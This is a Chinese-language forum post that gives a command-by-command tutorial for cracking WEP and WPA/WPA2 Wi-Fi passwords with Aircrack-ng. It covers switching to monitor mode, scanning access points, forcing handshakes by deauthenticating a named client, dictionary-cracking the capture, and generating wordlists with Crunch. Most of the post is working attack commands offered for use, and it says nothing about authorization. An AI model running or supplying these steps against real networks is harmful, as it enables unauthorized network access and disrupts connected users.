priess1314 发表于 2018-6-2 13:07:54

使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码


iwconfig

#确认网卡信息。


airmon-ng start wlan0

#激活网卡至监视模式。


airodump-ng wlan0mon

#获取附近AP 信息。

这里解释几个参数:
BSSID(Basic Service SetIdentifier): AP 的MAC 地址。
ESSID(The Extended Service Set Identifier): AP 的名称。
PWR(Power): 信号强度。
Beacons: AP发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒会发送10个左右的beacon,所以它们能在很远的地方就被发现。
#Data:当前数据传输量。
#/s:过去10秒钟内每秒捕获数据分组的数量。
CH(Channel): AP 所在的频道。
MB: AP 的最大传输速度。MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g。后面带.的表示短封包标头,处理速度快,更利于破解。
ENC(Encryption): 使用的加密算法体系。
CIPHER: 检测到的加密算法。#这个和ENC 的区别我确实不明白,有没有知道的朋友可以告诉我。
AUTH(Authority): 认证方式。
Elapsed: 用过的时间。

记录 TEST-jglimmers 的 MAC 地址(BSSID),频道(CH)。

BSSID: 88:25:93:5A:B5:6A
CH: 1

airodump-ng --ivs -w 文件地址 --bssid BSSID wlan0mon #开始抓包, -w(write) 抓到的包保存的位置



aireplay-ng -0 10 -a 88:25:93:5A:B5:6A -c 68:17:29:26:C3:16 wlan0mon

#如果发现像我一样得到的数据较少可尝试发送数据包


当经过第2 步发送大量数据包之后只要发现第1 步中右上角出现了 handshake: AP的MAC(BSSID),就可以 CRTL+C 停止。


aircrack-ng -w Wordlists.txt CAP-01.cap

#-w表示字典包的路径, CAP 表示第 1 步中保存的文件中 -01.cap

这样等待破解成功即可!
这里给大家推荐一个密码生成工具 Crunch
如:要生成0-9之间的密码,执行命令

crunch 8 8 0123456789 -o /root/pass.txt



页: [1]
查看完整版本: 使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码